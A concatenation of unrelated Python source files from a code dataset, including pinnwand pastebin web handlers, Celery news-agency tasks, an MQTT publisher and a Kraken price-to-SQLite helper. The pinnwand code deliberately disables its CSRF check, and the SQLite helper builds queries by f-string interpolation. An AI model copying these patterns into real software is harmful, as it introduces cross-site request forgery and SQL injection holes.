utility\n\nlog = logging.getLogger(__name__)\n\n\nclass Base(tornado.web.RequestHandler):\n \"\"\"Base page for all 'web' pages to inherit from. This page handles\n default methods for GET and POST but more importantly overwrites\n `write_error` to render error pages.\n\n It automatically converts ValidationError to a 400 error page but leaves\n other HTTPErrors alone.\"\"\"\n\n def write_error(self, status_code: int, **kwargs: Any) -> None:\n if status_code == 404:\n self.render(\n \"error.html\",\n text=\"That page does not exist\",\n status_code=404,\n pagetitle=\"error\",\n )\n else:\n type_, exc, traceback = kwargs[\"exc_info\"]\n\n if type_ == error.ValidationError:\n self.set_status(400)\n self.render(\n \"error.html\",\n text=str(exc),\n status_code=400,\n pagetitle=\"error\",\n )\n elif type_ == error.RatelimitError:\n self.set_status(429)\n self.render(\n \"error.html\",\n text=str(exc),\n status_code=429,\n pagetitle=\"error\",\n )\n elif type_ == error.SpamError:\n self.set_status(451)\n self.render(\n \"error.html\",\n text=str(exc),\n status_code=429,\n pagetitle=\"error\",\n )\n else:\n self.render(\n \"error.html\",\n text=\"unknown error\",\n status_code=500,\n pagetitle=\"error\",\n )\n\n async def get(self) -> None:\n raise tornado.web.HTTPError(404)\n\n async def post(self) -> None:\n raise tornado.web.HTTPError(405)\n\n\nclass Create(Base):\n \"\"\"The index page shows the new paste page with a list of all available\n lexers from Pygments.\"\"\"\n\n async def get(self, lexers: str = \"\") -> None:\n \"\"\"Render the new paste form, optionally have a lexer preselected from\n the URL.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n lexers_available = utility.list_languages()\n lexers_selected = [\n lexer for lexer in lexers.split(\"+\") if lexer.strip()\n ]\n\n if not lexers_selected:\n lexers_selected = [configuration.default_selected_lexer]\n\n # Make sure all lexers are available\n if not all(lexer in lexers_available for lexer in lexers_selected):\n log.debug(\"CreatePaste.get: non-existent lexer requested\")\n raise tornado.web.HTTPError(404)\n\n await self.render(\n \"create.html\",\n expiries=configuration.expiries,\n lexers=lexers_selected,\n lexers_available=lexers_available,\n pagetitle=\"Create new paste\",\n message=None,\n paste=None,\n )\n\n async def post(self) -> None:\n \"\"\"This is a historical endpoint to create pastes, pastes are marked as\n old-web and will get a warning on top of them to remove any access to\n this route.\n\n pinnwand has since evolved with an API which should be used and a\n multi-file paste.\n\n See the 'CreateAction' for the new-style creation of pastes.\"\"\"\n\n lexer = self.get_body_argument(\"lexer\")\n raw = self.get_body_argument(\"code\", strip=False)\n expiry = self.get_body_argument(\"expiry\")\n\n if defensive.ratelimit(self.request, area=\"create\"):\n raise error.RatelimitError()\n\n if lexer not in utility.list_languages():\n log.info(\"Paste.post: a paste was submitted with an invalid lexer\")\n raise tornado.web.HTTPError(400)\n\n # Guard against empty strings\n if not raw or not raw.strip():\n return self.redirect(f\"/+{lexer}\")\n\n if expiry not in configuration.expiries:\n log.info(\"Paste.post: a paste was submitted with an invalid expiry\")\n raise tornado.web.HTTPError(400)\n\n paste = database.Paste(\n utility.slug_create(),\n configuration.expiries[expiry],\n \"deprecated-web\",\n )\n file = database.File(paste.slug, raw, lexer)\n paste.files.append(file)\n\n with database.session() as session:\n session.add(paste)\n session.commit()\n\n # The removal cookie is set for the specific path of the paste it is\n # related to\n self.set_cookie(\n \"removal\", str(paste.removal), path=f\"/{paste.slug}\"\n )\n\n # Send the client to the paste\n self.redirect(f\"/{paste.slug}\")\n\n def check_xsrf_cookie(self) -> None:\n \"\"\"The CSRF token check is disabled. While it would be better if it\n was on the impact is both small (someone could make a paste in\n a users name which could allow pinnwand to be used as a vector for\n exfiltration from other XSS) and some command line utilities\n POST directly to this endpoint without using the JSON endpoint.\"\"\"\n return\n\n\nclass CreateAction(Base):\n \"\"\"The create action is the 'new' way to create pastes and supports multi\n file pastes.\"\"\"\n\n def post(self) -> None: # type: ignore\n \"\"\"POST handler for the 'web' side of things.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"create\"):\n raise error.RatelimitError()\n\n expiry = self.get_body_argument(\"expiry\")\n\n if expiry not in configuration.expiries:\n log.info(\n \"CreateAction.post: a paste was submitted with an invalid expiry\"\n )\n raise error.ValidationError()\n\n auto_scale = self.get_body_argument(\"long\", None) is None\n\n lexers = self.get_body_arguments(\"lexer\")\n raws = self.get_body_arguments(\"raw\", strip=False)\n filenames = self.get_body_arguments(\"filename\")\n\n if not all([lexers, raws, filenames]):\n # Prevent empty argument lists from making it through\n raise error.ValidationError()\n\n if not all(raw.strip() for raw in raws):\n # Prevent empty raws from making it through\n raise error.ValidationError()\n\n if any(len(L) != len(lexers) for L in [lexers, raws, filenames]):\n log.info(\"CreateAction.post: mismatching argument lists\")\n raise error.ValidationError()\n\n if any(lexer not in utility.list_languages() for lexer in lexers):\n log.info(\"CreateAction.post: a file had an invalid lexer\")\n raise error.ValidationError()\n\n with database.session() as session, utility.SlugContext(\n auto_scale\n ) as slug_context:\n paste = database.Paste(\n next(slug_context), configuration.expiries[expiry], \"web\"\n )\n\n for lexer, raw, filename in zip(lexers, raws, filenames):\n paste.files.append(\n database.File(\n next(slug_context),\n raw,\n lexer,\n filename if filename else None,\n )\n )\n\n if sum(len(f.fmt) for f in paste.files) > configuration.paste_size:\n log.info(\"CreateAction.post: sum of files was too large\")\n raise error.ValidationError()\n\n # For the first file we will always use the same slug as the paste,\n # since slugs are generated to be unique over both pastes and files\n # this can be done safely.\n paste.files[0].slug = paste.slug\n\n session.add(paste)\n session.commit()\n\n # The removal cookie is set for the specific path of the paste it is\n # related to\n self.set_cookie(\n \"removal\", str(paste.removal), path=f\"/{paste.slug}\"\n )\n\n # Send the client to the paste\n self.redirect(f\"/{paste.slug}\")\n\n\nclass Repaste(Base):\n \"\"\"Repaste is a specific case of the paste page. It only works for pre-\n existing pastes and will prefill the textarea and lexer.\"\"\"\n\n async def get(self, slug: str) -> None: # type: ignore\n \"\"\"Render the new paste form, optionally have a lexer preselected from\n the URL.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n paste = (\n session.query(database.Paste)\n .filter(database.Paste.slug == slug)\n .first()\n )\n\n if not paste:\n raise tornado.web.HTTPError(404)\n\n lexers_available = utility.list_languages()\n\n await self.render(\n \"create.html\",\n expiries=configuration.expiries,\n lexers=[\"text\"], # XXX make this majority of file lexers?\n lexers_available=lexers_available,\n pagetitle=\"repaste\",\n message=None,\n paste=paste,\n )\n\n\nclass Show(Base):\n \"\"\"Show a paste.\"\"\"\n\n async def get(self, slug: str) -> None: # type: ignore\n \"\"\"Fetch paste from database by slug and render the paste.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n paste = (\n session.query(database.Paste)\n .filter(database.Paste.slug == slug)\n .first()\n )\n\n if not paste:\n raise tornado.web.HTTPError(404)\n\n if paste.exp_date < datetime.utcnow():\n session.delete(paste)\n session.commit()\n\n log.warn(\n \"Show.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n can_delete = self.get_cookie(\"removal\") == str(paste.removal)\n\n self.render(\n \"show.html\",\n paste=paste,\n pagetitle=f\"View paste {paste.slug}\",\n can_delete=can_delete,\n linenos=False,\n )\n\n\nclass RedirectShow(Base):\n \"\"\"Redirect old-style \"/show/\" paths to new-style \"/\" paths.\"\"\"\n\n async def get(self, slug: str) -> None: # type: ignore\n \"\"\"Fetch paste from database and redirect to /slug if the paste\n exists.\"\"\"\n with database.session() as session:\n paste = (\n session.query(database.Paste)\n .filter(database.Paste.slug == slug)\n .first()\n )\n\n if not paste:\n raise tornado.web.HTTPError(404)\n\n if paste.exp_date < datetime.utcnow():\n session.delete(paste)\n session.commit()\n\n log.warn(\n \"RedirectShow.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n self.redirect(f\"/{paste.slug}\")\n\n\nclass FileRaw(Base):\n \"\"\"Show a file as plaintext.\"\"\"\n\n async def get(self, file_id: str) -> None: # type: ignore\n \"\"\"Get a file from the database and show it in the plain.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n file = (\n session.query(database.File)\n .filter(database.File.slug == file_id)\n .first()\n )\n\n if not file:\n raise tornado.web.HTTPError(404)\n\n if file.paste.exp_date < datetime.utcnow():\n session.delete(file.paste)\n session.commit()\n\n log.warn(\n \"FileRaw.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n self.set_header(\"Content-Type\", \"text/plain; charset=utf-8\")\n self.write(file.raw)\n\n\nclass FileHex(Base):\n \"\"\"Show a file as hexadecimal.\"\"\"\n\n async def get(self, file_id: str) -> None: # type: ignore\n \"\"\"Get a file from the database and show it in hex.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n file = (\n session.query(database.File)\n .filter(database.File.slug == file_id)\n .first()\n )\n\n if not file:\n raise tornado.web.HTTPError(404)\n\n if file.paste.exp_date < datetime.utcnow():\n session.delete(file.paste)\n session.commit()\n\n log.warn(\n \"FileRaw.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n self.set_header(\"Content-Type\", \"text/plain; charset=utf-8\")\n self.write(binascii.hexlify(file.raw.encode(\"utf8\")))\n\n\nclass PasteDownload(Base):\n \"\"\"Download an entire paste.\"\"\"\n\n async def get(self, paste_id: str) -> None: # type: ignore\n \"\"\"Get all files from the database and download them as a zipfile.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n paste = (\n session.query(database.Paste)\n .filter(database.Paste.slug == paste_id)\n .first()\n )\n\n if not paste:\n raise tornado.web.HTTPError(404)\n\n if paste.exp_date < datetime.utcnow():\n session.delete(paste)\n session.commit()\n\n log.warn(\n \"FileRaw.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n data = io.BytesIO()\n\n with zipfile.ZipFile(data, \"x\") as zf:\n for file in paste.files:\n if file.filename:\n filename = f\"{utility.filename_clean(file.filename)}-{file.slug}.txt\"\n else:\n filename = f\"{file.slug}.txt\"\n\n zf.writestr(filename, file.raw)\n\n data.seek(0)\n\n self.set_header(\"Content-Type\", \"application/zip\")\n self.set_header(\n \"Content-Disposition\", f\"attachment; filename={paste.slug}.zip\"\n )\n self.write(data.read())\n\n\nclass FileDownload(Base):\n \"\"\"Download a file.\"\"\"\n\n async def get(self, file_id: str) -> None: # type: ignore\n \"\"\"Get a file from the database and download it in the plain.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n file = (\n session.query(database.File)\n .filter(database.File.slug == file_id)\n .first()\n )\n\n if not file:\n raise tornado.web.HTTPError(404)\n\n if file.paste.exp_date < datetime.utcnow():\n session.delete(file.paste)\n session.commit()\n\n log.warn(\n \"FileDownload.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n self.set_header(\"Content-Type\", \"text/plain; charset=utf-8\")\n\n if file.filename:\n filename = (\n f\"{utility.filename_clean(file.filename)}-{file.slug}.txt\"\n )\n else:\n filename = f\"{file.slug}.txt\"\n\n self.set_header(\n \"Content-Disposition\", f\"attachment; filename={filename}\"\n )\n self.write(file.raw)\n\n\nclass Remove(Base):\n \"\"\"Remove a paste.\"\"\"\n\n async def get(self, removal: str) -> None: # type: ignore\n \"\"\"Look up if the user visiting this page has the removal id for a\n certain paste. If they do they're authorized to remove the paste.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"delete\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n paste = (\n session.query(database.Paste)\n .filter(database.Paste.removal == removal)\n .first()\n )\n\n if not paste:\n log.info(\"RemovePaste.get: someone visited with invalid id\")\n raise tornado.web.HTTPError(404)\n\n if paste.exp_date < datetime.utcnow():\n session.delete(paste)\n session.commit()\n\n log.warn(\n \"Remove.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n session.delete(paste)\n session.commit()\n\n self.redirect(\"/\")\n\n\nclass RestructuredTextPage(Base):\n \"\"\"Render a given file as RestructuredText.\"\"\"\n\n def initialize(self, file: str) -> None:\n self.file = file\n\n async def get(self) -> None:\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n try:\n with open(path.page / self.file) as f:\n html = docutils.core.publish_parts(\n f.read(), writer_name=\"html\"\n )[\"html_body\"]\n except FileNotFoundError:\n raise tornado.web.HTTPError(404)\n\n self.render(\n \"restructuredtextpage.html\",\n html=html,\n pagetitle=(path.page / self.file).stem,\n )\n\n\nclass Logo(Base):\n \"\"\"Render an image file at the logo path.\"\"\"\n\n def initialize(self, path: str) -> None:\n self.path = path\n\n async def get(self) -> None:\n self.set_header(\"Content-Type\", \"image/png\")\n\n with open(self.path, \"rb\") as f:\n self.write(f.read())\n","repo_name":"supakeen/pinnwand","sub_path":"src/pinnwand/handler/website.py","file_name":"website.py","file_ext":"py","file_size_in_byte":18540,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"27"} +{"seq_id":"4053938315","text":"import matplotlib.pyplot as plt\n# Change the line plot below to a scatter plot\nplt.scatter(gdp_cap, life_exp)\n\n# Put the x-axis on a logarithmic scale\nplt.xscale('log')\n\n# Strings\nxlab = 'GDP per Capita [in USD]'\nylab = 'Life Expectancy [in years]'\ntitle = 'World Development in 2007'\n\n# Add axis labels\nplt.xlabel(xlab)\nplt.ylabel(ylab)\nplt.title(title)\n\n# Show plot\nplt.show()","repo_name":"Nishant1027/my-matplot","sub_path":"label&function.py","file_name":"label&function.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"18128488964","text":"# -*- coding: utf-8 -*-\n\nfrom PIL.BmpImagePlugin import BmpImageFile\nfrom PIL import Image\nfrom aiida.orm import Data\n\n\nclass GOLSystem(Data):\n \"\"\"\n This is a data node for Conway's Game of Life\n \"\"\"\n def __init__(self, array=None, **kwargs):\n \"\"\"\n :param array: numpy array of booleans, True = alive, False = dead\n \"\"\"\n\n super(Data, self).__init__(**kwargs)\n\n if isinstance(array, BmpImageFile):\n array = array.convert('1')\n width, height = array.size\n array = [[bool(array.getpixel((ii, jj))) for ii in range(width)]\n for jj in range(height)]\n else:\n array = [[bool(array[ii, jj]) for ii in range(array.shape[0])]\n for jj in range(array.shape[1])]\n\n self.set_attribute('array', array)\n\n def as_array(self):\n return self.get_attribute('array')\n\n def get_dimensions(self):\n array = self.as_array()\n return len(array[0]), len(array)\n\n def get_bitmap(self):\n width, height = self.get_dimensions()\n array = self.as_array()\n img = Image.new('1', (width, height), 0)\n for ii in range(width):\n for jj in range(height):\n img.putpixel((ii, jj), int(array[ii][jj]))\n return img\n","repo_name":"addman2/aiida-python","sub_path":"example/gol/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"29458728716","text":"# coding=utf-8\r\n# -*- coding: utf-8 -*-\r\n\r\n\r\nimport arrow\r\nimport numpy as np\r\n\r\nfrom functools import wraps\r\n\r\n#\r\nimport matplotlib as mpl\r\nimport matplotlib.colors\r\nfrom matplotlib import cm\r\n\r\n#\r\nimport zsys\r\nimport ztools as zt\r\nimport ztools_str as zstr\r\nimport ztools_web as zweb\r\n\r\nzt_fun_tst_time_nloop = 5\r\n\r\n\r\ndef fun_tim01(function):\r\n @wraps(function)\r\n def fun_tim(*args, **kwargs):\r\n t0 = arrow.now()\r\n result = function(*args, **kwargs)\r\n tn = zt.timNSec(arrow.now(), t0)\r\n print('tn,{0:.3f}s,fun:{1}'.format(tn, function.__name__))\r\n return result\r\n return fun_tim\r\n\r\n\r\ndef fun_timer(function):\r\n @wraps(function)\r\n def function_timer(*args, **kwargs):\r\n xt0 = 999999\r\n xt9 = 0\r\n xtn = 0\r\n xtsum = 0\r\n for xc in range(zt_fun_tst_time_nloop):\r\n t0 = arrow.now()\r\n # tfn = function(*args, **kwargs)\r\n t1 = arrow.now()\r\n xtn = t1 - t0\r\n xt0 = min(xt0, xtn)\r\n xt9 = max(xt9, xtn)\r\n xtsum = xtsum + xtn\r\n # print (\" %d # ,t:%.4f s,t.min:%.4f s, t.max:%.4f s, t.sum:%.4f\r\n # s \" % (xc,xtn,xt0,xt9,xtsum))\r\n\r\n #\r\n xt5 = xtsum / zt.zt_fun_tst_time_nloop\r\n # print('')\r\n # print('xt5,',xt5,zt_fun_tst_time_nloop)\r\n # print (\" %d # trd, %.4f s\" % (args[1],t1-t0))\r\n print(\" %d # trd, t:%.6f s, t0:%.6f s, t9:%.6f s\" %\r\n (args[1], xt5, xt0, xt9))\r\n\r\n # print('var',args[1])\r\n return xt5, xt0, xt9\r\n\r\n return function_timer\r\n\r\n\r\ndef fun_tim050(func, dat, css):\r\n xt0 = 999999\r\n xt9 = 0\r\n xtn = 0\r\n xtsum = 0\r\n for xc in range(zt_fun_tst_time_nloop):\r\n t0 = arrow.now()\r\n func(dat)\r\n t1 = arrow.now()\r\n xtn = t1 - t0\r\n xt0 = min(xt0, xtn)\r\n xt9 = max(xt9, xtn)\r\n xtsum = xtsum + xtn\r\n #\r\n xt5 = xtsum / zt_fun_tst_time_nloop\r\n print(\"%s,%s, t:%.6f s, t0:%.6f s, t9:%.6f s,nloop:%d\" %\r\n (css, func.__name__, xt5, xt0, xt9, zt_fun_tst_time_nloop))\r\n # print('tn:%.6f,%s'%(t1-t0,func.__name__))\r\n\r\n\r\ndef fun_tim010(func, dat):\r\n\r\n t0 = arrow.now()\r\n func(dat)\r\n t1 = arrow.now()\r\n print('tn:%.6f,%s' % (t1 - t0, func.__name__))\r\n\r\n\r\ndef fun_tim010call():\r\n # arr = np.arange(9999999).reshape(3333333, 3)\r\n dnum = 50000000\r\n d_np = np.arange(dnum)\r\n\r\n # zz_tst010(abs001,d_np,'py tn:')\r\n # zz_tst010(abs001_nb,d_np,'nb tn:')\r\n # zz_tst010(abs001_ex,d_np,'ex tn:')\r\n #\r\n # fun_tim010(sum2d,arr)\r\n # fun_tim010(sum2d_nb,arr)\r\n","repo_name":"haiya512/football.bobo","sub_path":"ztools_tst.py","file_name":"ztools_tst.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"37402546098","text":"class NumMatrix:\n \n def __init__(self, matrix: List[List[int]]):\n row = len(matrix)\n col = len(matrix[0])\n self.matrix = matrix.copy()\n for i in range(row):\n for j in range(1,col):\n self.matrix[i][j] = self.matrix[i][j-1] + self.matrix[i][j]\n\n\n def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:\n sum = 0\n for i in range(row1,row2 + 1):\n if col1 is 0:\n sum += self.matrix[i][col2]\n else:\n sum = sum + self.matrix[i][col2] - self.matrix[i][col1-1]\n return sum\n\n\n\n\n \"\"\"\n [[3, 0, 1, 4, 2],\n [5, 6, 3, 2, 1],\n [1, 2, 0, 1, 5],\n [4, 1, 0, 1, 7],\n [1, 0, 3, 0, 5]\n ],\n\n [3, 3, 4, 8, 10],\n [5, 11, 14, 16, 17],\n [1, 3, 3, 4, 9],\n [4, 5, 5, 6, 13],\n [1, 1, 4, 4, 9]\n ]\n \"\"\"\n\n\n# Your NumMatrix object will be instantiated and called as such:\n# obj = NumMatrix(matrix)\n# come there today\n# param_1 = obj.sumRegion(row1,col1,row2,col2)","repo_name":"yakin-ts/Interview-preparation-A2SV","sub_path":"range_sum_query.py","file_name":"range_sum_query.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30418138550","text":"import datetime\n\nfrom run import iha_queue, dha_queue, aa_queue, reuters_queue, ap_queue, hha_queue\nfrom src.tasks.delete_contents import remove_contents_from_cms\nfrom src.tasks.insert_contents import insert_contents\n\n\ndef init_tasks(app, celery, settings):\n @celery.task()\n def insert_contents_to_cms():\n #: check configurations per 30 seconds for run task.\n #: run insert contents to cms job if the configuration next_run_time field is less than or equal to now.\n #: shift next_run_time by configuration interval value\n configs = list(app.db.configurations.find({\n 'next_run_time': {\n '$lte': datetime.datetime.utcnow()\n },\n 'agency_name': {\n '$in': ['AA', 'IHA', 'Reuters', 'AP', 'DHA', 'HHA']\n },\n 'agency_status': 'active'\n }))\n\n for config in configs:\n app.db.configurations.find_and_modify(\n {\n '_id': config['_id']\n },\n {\n '$set': {\n 'next_run_time': datetime.datetime.utcnow() + datetime.timedelta(seconds=int(config['sync_at']))\n }\n }\n )\n\n insert_contents(configs, settings, app.db, app.redis_queue)\n\n @celery.task()\n def delete_expired_contents_from_cms():\n #: get contents from created by the user defined in settings via _query endpoint\n #: remove content if content status is unpublished and\n #: Now date is greater than sum of content's created_at and configuration expire field\n configs = list(app.db.configurations.find({\n 'next_run_time_for_delete': {\n '$lte': datetime.datetime.utcnow()\n },\n 'agency_name': {\n '$in': ['AA', 'IHA', 'Reuters', 'AP', 'DHA', 'HHA']\n },\n 'agency_status': 'active'\n }))\n\n for config in configs:\n app.db.configurations.find_and_modify(\n {\n '_id': config['_id']\n },\n {\n '$set': {\n 'next_run_time_for_delete': datetime.datetime.utcnow() + datetime.timedelta(\n minutes=int(config['expire_time']))\n }\n }\n )\n\n remove_contents_from_cms(configs, settings, app.db, app.redis_queue)\n\n @celery.task()\n def sync_queues_to_mongo():\n agency_queues = {\n 'iha_queue': iha_queue,\n 'dha_queue': dha_queue,\n 'aa_queue': aa_queue,\n 'reuters_queue': reuters_queue,\n 'ap_queue': ap_queue,\n 'hha_queue': hha_queue\n }\n\n for queue in agency_queues.keys():\n for content_id in agency_queues[queue]:\n app.db.queues.save({\n 'agency_type': queue,\n 'content_id': content_id\n })\n\n @celery.task()\n def sync_mongo_to_queues():\n agency_queues = {\n 'iha_queue': iha_queue,\n 'dha_queue': dha_queue,\n 'aa_queue': aa_queue,\n 'reuters_queue': reuters_queue,\n 'ap_queue': ap_queue,\n 'hha_queue': hha_queue\n }\n\n for queue in agency_queues.keys():\n queues_cursor = app.db.queues.find({\n 'agency_type': queue\n }).sort({'_id': -1}).limit(15000)\n\n queues_cursor.sort({'_id': 1})\n for doc in queues_cursor:\n agency_queues[queue].append(doc['content_id'])\n","repo_name":"ismetacar/input","sub_path":"src/tasks/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"12648359196","text":"import time\r\nfrom paho.mqtt import client as mc\r\n\r\nbroker = 'mqtt.eclipseprojects.io'\r\nclient_id='id1'\r\n\r\ndef my_call(client, userdata, flags, rc):\r\n if rc == 0:\r\n print(\"Connected to MQTT Broker!\")\r\n else:\r\n print(\"Failed to connect, return code %d\\n\", rc)\r\n\r\n\r\ndef publish(client):\r\n time.sleep(1)\r\n msg = 30\r\n result = client.publish('int', msg)\r\n status = result[0]\r\n if status == 0:\r\n print(msg)\r\n else:\r\n print(\"Message not sent {msg}\")\r\n msg = 'a'\r\n result = client.publish('char', msg)\r\n status = result[0]\r\n if status == 0:\r\n print(msg)\r\n else:\r\n print(\"Message not sent {msg}\")\r\n msg = \"String published message\"\r\n result = client.publish('str', msg)\r\n status = result[0]\r\n if status == 0:\r\n print(msg)\r\n else:\r\n print(\"Message not sent {msg}\")\r\n \r\n\r\nclient = mc.Client('id1')\r\nclient.on_connect = my_call\r\nclient.connect(broker)\r\n\r\nclient.loop_start()\r\npublish(client)\r\nclient.loop_stop()\r\n\r\n","repo_name":"Scarlet-15/MQTT-Server","sub_path":"Mqtt_Publish.py","file_name":"Mqtt_Publish.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19410118049","text":"import pathlib\nimport pandas as pd\nimport datetime\n# DB Management\nimport requests\nimport sqlalchemy as sqlalchemy\nimport streamlit as st\n\ndb_name = 'HLOCV.db'\nroot_dir0 = pathlib.Path(__file__).resolve().parents[0]\ndb_path = 'sqlite:///' + str(pathlib.Path.joinpath(root_dir0, db_name))\n\nengine = sqlalchemy.create_engine(db_path, echo=True, connect_args={\"check_same_thread\": False, 'timeout': 5})\nconn = engine.connect()\n\n\ndef download_ticker_df(ticker, start, interval=1440):\n \"\"\"\n Example requ: requests.get('https://api.kraken.com/0/public/OHLC?pair=XBTUSD')\n :param interval: timeframe in minutes (1d: 1440)\n :param ticker: str\n :param start: linuxtmps\n :return: pd.Dataframe\n \"\"\"\n url = 'https://api.kraken.com/0/public/OHLC'\n params = {'pair': ticker, 'interval': interval, 'since': start}\n res = requests.get(url, params=params)\n data = res.json()\n print(data)\n if ticker == \"XBTUSD\":\n df = pd.DataFrame(data['result'][\"XXBTZUSD\"])\n if ticker == \"XBTEUR\":\n df = pd.DataFrame(data['result'][\"XXBTZEUR\"])\n else:\n df = pd.DataFrame(data['result'][ticker])\n df.columns = ['timestamp', 'open', 'high', 'low', 'close', 'vwap', 'volume', 'count']\n\n # Convert the columns to float\n df = df.apply(pd.to_numeric, errors='coerce')\n\n df['ticker'] = ticker\n return df\n\n\ndef add_ohlc(ticker, start):\n df = download_ticker_df(ticker, start)\n df.to_sql(ticker, engine, if_exists='replace', index=False)\n\n\ndef get_ohlc_from_db(ticker):\n sqlite_query_string = sqlalchemy.sql.text(f\"SELECT * FROM {ticker}\")\n df = pd.read_sql(sqlite_query_string, con=conn)\n return df\n\n\ndef get_ticker_from_db(ticker, timestamp):\n \"\"\"\n :param ticker: str (SOLEUR)\n :param timestamp: linux timestamp\n :return:\n return df like:\n timestamp open high low close vwap volume count ticker\n 0 1672012800 10.68 10.8 10.4 10.63 10.56 36129.483519 1115 SOLEUR\n \"\"\"\n sqlite_query_string = sqlalchemy.sql.text(f\"SELECT * FROM {ticker} WHERE timestamp = '{timestamp}'\")\n df = pd.read_sql(sqlite_query_string, con=conn)\n if df.empty:\n st.error(f\"ticker: {ticker} or/and timestamp: {timestamp} not in database\")\n st.stop()\n return df\n\n\ndef add_list_of_ohlc(ticker_list, start):\n for ticker in ticker_list:\n add_ohlc(ticker, start)\n\n\ndef get_list_of_ohlc_from_db(ticker_list):\n df_list = []\n for ticker in ticker_list:\n df_list.append(get_ohlc_from_db(ticker))\n return df_list\n\n\ndef close_db_connection(self):\n self.conn.close()\n","repo_name":"RaphaelBecker/staking_rewards","sub_path":"data_requests.py","file_name":"data_requests.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19562802448","text":"import utils_sickle_stats as utils\nimport numpy as np\nimport pandas as pd\nimport os\nimport datetime\nimport pytz\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\nlogger = utils.logger\n\n\ndef main(args):\n logger.info('==================================')\n logger.info('PLOT FIGURES')\n\n pix_dir = os.path.join(args.working_dir, 'figures')\n utils.safe_mkdir(pix_dir)\n\n filename = os.path.join(\n args.confidential_dir, args.clean_file)\n df = pd.read_csv(filename)\n\n if True:\n # Plot length of time of after transfusion until SPRT confidence is\n # achieved.\n df_treated = df.iloc[df.patient_treated.values]\n\n transfusion_dates = np.sort(\n np.unique(df_treated.infusion_epoch.values))\n transfusion_dates = [datetime.datetime.fromtimestamp(\n t, tz=pytz.utc) for t in transfusion_dates]\n end_date = datetime.datetime(2018, 10, 1)\n\n transfusion_dates_mpl = [mdates.date2num(t) for t in transfusion_dates]\n end_date_mpl = 6 * [mdates.date2num(end_date)]\n\n date_duration = [end_date_mpl[i] - transfusion_dates_mpl[i]\n for i in range(6)]\n plt.figure(figsize=(8, 6))\n plt.barh(1 + np.arange(len(transfusion_dates)), date_duration,\n left=transfusion_dates_mpl,\n alpha=.7\n )\n d1 = mdates.date2num(datetime.datetime(2018, 1, 31))\n plt.plot([d1, d1], [0, 6.5], ':', label='95% confidence')\n\n d2 = mdates.date2num(datetime.datetime(2018, 2, 26))\n plt.plot([d2, d2], [0, 6.5], ':', label='99% confidence')\n plt.legend()\n plt.ylabel('Subject')\n plt.xlabel('Time since transfusion')\n plt.ylim([.5, 6.5])\n # We need to tell matplotlib that these are dates...\n ax = plt.gca()\n ax.xaxis_date()\n # Rotate date ticks so they're legible\n plt.gcf().autofmt_xdate()\n\n ax.axis('tight')\n\n filename = os.path.join(pix_dir, 'SPRT_vanilla.png')\n plt.savefig(filename)\n\n\nif __name__ == '__main__':\n args = utils.parse_arguments()\n utils.initialize_logger(args)\n main(args)\n","repo_name":"wfbradley/sickle_stats","sub_path":"A90_plot_figures.py","file_name":"A90_plot_figures.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"1546675213","text":"import torch, os, shutil, time\n\nFROM_DIR = r\"C:\\Users\\xmk233\\.cache\\torch\\transformers\"\nFILE_PATH = r\"J:\\ModelStoreData\\PyTorchHub\\2020-01-07\\files\\PyTorch-Transformers\"\ndef test(model_name):\n time.sleep(1)\n # try:\n ###\n print(\"Downloading {}...\".format(model_name))\n if model_name == \"gpt2-large\" or model_name == \"gpt2-xl\": \n model = torch.hub.load('huggingface/pytorch-transformers', 'model', model_name, from_tf = True)\n else:\n model = torch.hub.load('huggingface/pytorch-transformers', 'model', model_name)\n ######\n shutil.move(FROM_DIR, os.path.join(FILE_PATH, model_name))\n 